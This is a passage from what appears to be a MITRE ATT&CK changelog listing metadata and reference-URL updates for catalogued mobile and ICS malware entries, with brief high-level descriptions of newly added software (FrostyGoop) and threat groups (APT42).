modified | 2020-09-11 15:45:38.235000+00:00 | 2025-04-16 21:22:07.148000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0479] DEFENSOR ID
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-06-26 20:16:31.850000+00:00 | 2025-04-16 21:22:08.935000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0301] Dendroid
Current version: 2.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:06.526000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0550] DoubleAgent
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-04-19 17:05:42.253000+00:00 | 2025-04-16 21:22:07.802000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0300] DressCode
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:16.646000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1054] Drinik
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-04-13 22:33:34.237000+00:00 | 2024-11-17 18:11:27.761000+00:00 |
external_references[1]['description'] | Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023. | Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved November 17, 2024. |
external_references[1]['url'] | https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/ | https://web.archive.org/web/20221114031945/https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/ |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0320] DroidJack
Current version: 1.2
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-05-20 17:13:16.506000+00:00 | 2025-04-16 21:22:03.310000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0315] DualToy
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:08.432000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0420] Dvmap
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-01-22 22:17:23.015000+00:00 | 2025-04-16 21:22:05.219000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0478] EventBot
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-06-26 21:01:58.595000+00:00 | 2025-04-16 21:22:12.346000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0405] Exodus
Current version: 1.0
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_deprecated | | False |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2019-10-14 17:15:52.191000+00:00 | 2024-11-17 18:31:54.806000+00:00 |
external_references[3]['description'] | Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019. | Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved November 17, 2024. |
external_references[3]['url'] | https://securitywithoutborders.org/blog/2019/03/29/exodus.html | https://web.archive.org/web/20200314194610/https://securitywithoutborders.org/blog/2019/03/29/exodus.html |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0509] FakeSpy
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-10-06 20:09:57.659000+00:00 | 2025-04-16 21:22:10.213000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0408] FlexiSpy
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2019-10-14 18:08:28.349000+00:00 | 2025-04-16 21:22:17.243000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0536] GPlayed
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-11-24 17:55:12.561000+00:00 | 2025-04-16 21:22:12.191000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0423] Ginp
Current version: 1.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-09-11 15:50:18.707000+00:00 | 2025-04-16 21:22:09.244000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0535] Golden Cup
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-12-22 21:48:10.951000+00:00 | 2025-04-16 21:22:15.703000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0551] GoldenEagle
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-03-25 16:20:28.165000+00:00 | 2025-04-16 21:22:03.977000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0421] GolfSpy
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-03-26 20:50:07.023000+00:00 | 2025-04-16 21:22:12.846000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0290] Gooligan
Current version: 1.2
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:04.607000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0406] Gustuff
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2019-10-14 19:14:17.007000+00:00 | 2025-04-16 21:22:16.804000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0544] HenBox
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-04-12 03:02:06.792000+00:00 | 2025-04-16 21:22:12.500000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0322] HummingBad
Current version: 1.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-04-21 18:52:08.966000+00:00 | 2025-04-16 21:22:13.785000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0321] HummingWhale
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:09.395000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0463] INSOMNIA
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-06-24 18:24:35.433000+00:00 | 2025-04-16 21:22:05.067000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0325] Judy
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:04.284000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0288] KeyRaider
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:07.456000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0485] Mandrake
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-09-11 15:52:12.097000+00:00 | 2025-04-16 21:22:08.595000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0303] MazarBOT
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:09.084000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0407] Monokle
Current version: 1.2
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-11-01 18:30:41.998000+00:00 | 2025-04-16 21:22:09.753000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0299] NotCompatible
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:05.573000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0286] OBAD
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:13.949000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0285] OldBoot
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:04.440000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0291] PJApps
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:13.454000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0399] Pallas
Current version: 1.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2019-09-18 20:17:17.744000+00:00 | 2025-04-16 21:22:12.993000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0316] Pegasus for Android
Current version: 1.2
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:10.874000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1126] Phenakite
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-04-17 14:17:42.833000+00:00 | 2024-11-17 20:01:55.807000+00:00 |
external_references[1]['description'] | Flossman, M., Scott, M. (2021, April). Technical Paper // Taking Action Against Arid Viper. Retrieved March 4, 2024. | Flossman, M., Scott, M. (2021, April). Technical Paper // Taking Action Against Arid Viper. Retrieved November 17, 2024. |
external_references[1]['url'] | https://web.archive.org/web/20231126111812/https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf | https://web.archive.org/web/20231126111812/https:/about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf |
[S0295] RCSAndroid
Current version: 1.2
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:06.991000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0539] Red Alert 2.0
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-12-16 20:52:20.822000+00:00 | 2025-04-16 21:22:09.903000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0326] RedDrop
Current version: 1.2
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_deprecated | | False |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2024-11-17 14:24:44.696000+00:00 |
external_references[2]['description'] | Nell Campbell. (2018, February 27). RedDrop: the blackmailing mobile malware family lurking in app stores. Retrieved September 18, 2018. | Nell Campbell. (2018, February 27). RedDrop: the blackmailing mobile malware family lurking in app stores. Retrieved November 17, 2024. |
external_references[2]['url'] | https://www.wandera.com/reddrop-malware/ | https://web.archive.org/web/20180618225805/https://www.wandera.com/reddrop-malware/ |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0403] Riltok
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2019-09-18 13:44:13.080000+00:00 | 2025-04-16 21:22:12.694000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0411] Rotexy
Current version: 1.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-09-11 15:53:38.216000+00:00 | 2025-04-16 21:22:03.463000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0313] RuMMS
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:10.719000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1062] S.O.V.A.
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-04-13 22:32:16.509000+00:00 | 2025-04-16 21:22:08.121000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S1055] SharkBot
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-02-28 21:05:57.018000+00:00 | 2025-04-16 21:22:11.187000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0294] ShiftyBug
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:13.608000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0549] SilkBean
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-04-19 14:29:45.809000+00:00 | 2025-04-16 21:22:14.758000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0419] SimBad
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-01-27 17:01:31.634000+00:00 | 2025-04-16 21:22:16.143000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0327] Skygofree
Current version: 1.2
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:07.299000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0324] SpyDealer
Current version: 1.2
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:10.366000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0305] SpyNote RAT
Current version: 1.2
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:04.768000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0328] Stealth Mango
Current version: 1.3
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:03.669000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0545] TERRACOTTA
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-12-28 18:59:32.817000+00:00 | 2025-04-16 21:22:15.370000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0329] Tangelo
Current version: 1.2
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:06.838000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1069] TangleBot
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-03-01 22:00:09.640000+00:00 | 2025-04-16 21:22:09.556000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S1056] TianySpy
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-03-29 21:11:14.364000+00:00 | 2025-04-16 21:22:16.464000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0558] Tiktok Pro
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-04-19 16:30:16.930000+00:00 | 2025-04-16 21:22:13.285000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0424] Triada
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-05-28 16:52:37.979000+00:00 | 2025-04-16 21:22:15.523000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0427] TrickMo
Current version: 1.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-09-11 15:57:37.561000+00:00 | 2025-04-16 21:22:04.918000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0307] Trojan-SMS.AndroidOS.Agent.ao
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:11.724000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0306] Trojan-SMS.AndroidOS.FakeInst.a
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:05.907000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0308] Trojan-SMS.AndroidOS.OpFake.a
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:14.410000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0302] Twitoor
Current version: 2.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:07.968000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0418] ViceLeaker
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-03-26 19:00:42.233000+00:00 | 2025-04-16 21:22:10.060000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0506] ViperRAT
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-09-29 20:03:42.662000+00:00 | 2025-04-16 21:22:15.850000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0312] WireLurker
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:06.693000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0489] WolfRAT
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2020-09-11 15:58:40.564000+00:00 | 2025-04-16 21:22:14.905000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0314] X-Agent for Android
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:08.784000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0318] XLoader for Android
Current version: 2.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:05.761000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0490] XLoader for iOS
Current version: 1.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-12-07 14:46:08.852000+00:00 | 2025-04-16 21:22:06.053000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0298] Xbot
Current version: 1.0
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:17.393000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0297] XcodeGhost
Current version: 1.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:14.566000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |

[S0311] YiSpecter
Current version: 2.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-04-20 18:19:15.826000+00:00 | 2025-04-16 21:22:11.527000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |

[S0494] Zen
Current version: 1.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2020-08-11 14:23:15.002000+00:00 | 2025-04-16 21:22:05.422000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |

[S0287] ZergHelper
Current version: 1.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:22:07.644000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |

ics-attack
New Software
[S1165] FrostyGoop
Current version: 1.0
Description:
FrostyGoop is a Windows-based binary written in Golang that allows for interaction with industrial control system (ICS) equipment via Modbus TCP over port 502. FrostyGoop allows for reading and writing data to holding registers on targeted devices, manipulating the operation of systems for malicious purposes. FrostyGoop is associated with the FrostyGoop Incident in Ukraine.(Citation: Dragos FROSTYGOOP 2024)(Citation: Nozomi BUSTLEBERM 2024)
Minor Version Changes
[S0606] Bad Rabbit
Current version: 1.1
Version changed from: 1.0 → 1.1
Old description: [Bad Rabbit](https://attack.mitre.org/software/S0606) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://attack.mitre.org/software/S0606) has also targeted organizations and consumers in Russia. (Citation: Secure List Bad Rabbit)(Citation: ESET Bad Rabbit)(Citation: Dragos IT ICS Ransomware)
New description: [Bad Rabbit](https://attack.mitre.org/software/S0606) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://attack.mitre.org/software/S0606) has also targeted organizations and consumers in Russia. (Citation: Secure List Bad Rabbit)(Citation: ESET Bad Rabbit)(Citation: Dragos Apr 2019)
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2022-10-12 17:29:57.200000+00:00 | 2025-01-02 19:45:31.402000+00:00 |
| description | [Bad Rabbit](https://attack.mitre.org/software/S0606) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://attack.mitre.org/software/S0606) has also targeted organizations and consumers in Russia. (Citation: Secure List Bad Rabbit)(Citation: ESET Bad Rabbit)(Citation: Dragos IT ICS Ransomware) | [Bad Rabbit](https://attack.mitre.org/software/S0606) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://attack.mitre.org/software/S0606) has also targeted organizations and consumers in Russia. (Citation: Secure List Bad Rabbit)(Citation: ESET Bad Rabbit)(Citation: Dragos Apr 2019) |
| external_references[3]['source_name'] | Dragos IT ICS Ransomware | Dragos Apr 2019 |
| external_references[3]['description'] | Slowik, J.. (2019, April 10). Implications of IT Ransomware for ICS Environments. Retrieved January 28, 2021. | Joe Slowik. (2019, April 10). Implications of IT Ransomware for ICS Environments. Retrieved October 27, 2019. |
| external_references[3]['url'] | https://www.dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/ | https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/ |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |

[S1010] VPNFilter
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-08-15 22:01:22.169000+00:00 | 2025-04-15 19:46:34.471000+00:00 |
| x_mitre_version | 2.0 | 2.1 |
| x_mitre_platforms[0] | Network | Network Devices |

Patches
[S1000] ACAD/Medre.A
Current version: 1.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2022-10-12 17:15:44.068000+00:00 | 2025-04-16 21:26:25.077000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |

[S0093] Backdoor.Oldrea
Current version: 2.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2022-10-12 17:18:25.971000+00:00 | 2025-04-16 20:37:53.808000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |

[S0608] Conficker
Current version: 1.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-03-08 22:15:47.458000+00:00 | 2025-04-16 20:38:10.239000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |

[S0038] Duqu
Current version: 1.2
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-03-08 22:17:50.971000+00:00 | 2025-04-16 20:38:14.352000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |

[S0605] EKANS
Current version: 2.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-03-08 22:04:48.834000+00:00 | 2025-04-16 20:37:51.908000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |

[S0143] Flame
Current version: 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2022-10-12 17:51:18.408000+00:00 | 2025-04-16 20:38:46.014000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |

[S1045] INCONTROLLER
Current version: 1.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-03-17 16:23:24.812000+00:00 | 2025-04-16 21:26:25.242000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |

[S1072] Industroyer2
Current version: 1.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-04-06 22:00:22.774000+00:00 | 2025-04-16 20:38:14.728000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |

[S0368] NotPetya
Current version: 2.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-03-08 22:11:21.842000+00:00 | 2025-04-16 20:38:09.202000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |

[S1006] PLC-Blaster
Current version: 1.0
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2022-10-12 17:59:55.276000+00:00 | 2025-04-16 21:26:24.423000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |

[S0496] REvil
Current version: 2.2
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-04-11 00:15:32.724000+00:00 | 2024-11-17 23:08:38.543000+00:00 |
| external_references[14]['description'] | Tetra Defense. (2020, March). CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS. Retrieved December 14, 2020. | Tetra Defense. (2020, March). CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS. Retrieved November 17, 2024. |
| external_references[14]['url'] | https://www.tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis | https://web.archive.org/web/20210414101816/https://tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis/ |

[S0446] Ryuk
Current version: 1.4
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-08-09 18:11:35.634000+00:00 | 2025-04-16 20:38:27.373000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |

[S0603] Stuxnet
Current version: 1.4
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2024-04-10 23:46:32.577000+00:00 | 2025-01-02 19:40:26.678000+00:00 |
| external_references[3]['url'] | https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf | https://web-assets.esetstatic.com/wls/2012/11/Stuxnet_Under_the_Microscope.pdf |
| external_references[4]['description'] | Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 | Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved November 17, 2024. |
| external_references[4]['url'] | https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf | https://docs.broadcom.com/doc/security-response-w32-stuxnet-dossier-11-en |

[S0366] WannaCry
Current version: 1.1
Details
values_changed
| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-03-08 22:20:20.868000+00:00 | 2024-12-09 02:29:13.859000+00:00 |
| external_references[8]['description'] | Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019. | Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved December 8, 2024. |
| external_references[8]['url'] | https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/ | https://web.archive.org/web/20230522041200/https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/ |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |

Groups
enterprise-attack
New Groups
[G1044] APT42
Current version: 1.0
Description:
APT42 is an Iranian-sponsored threat group that conducts cyber espionage and surveillance.(Citation: Mandiant APT42-charms) The group primarily focuses on targets in the Middle East region, but has targeted a variety of industries and countries since at least 2015.(Citation: Mandiant APT42-charms) APT42 starts cyber operations through spearphishing emails and/or the PINEFLOWER Android malware, then monitors and collects information from the compromised systems and devices.(Citation: Mandiant APT42-charms) Finally, APT42 exfiltrates data using native features and open-source tools.(Citation: Mandiant APT42-untangling)
APT42 activities have been linked to Magic Hound by other commercial vendors. While there are behavior and software overlaps between Magic Hound and APT42, they appear to be distinct entities and are tracked as separate entities by their originating vendor.
[G1043] BlackByte
Current version: 1.0
Description:
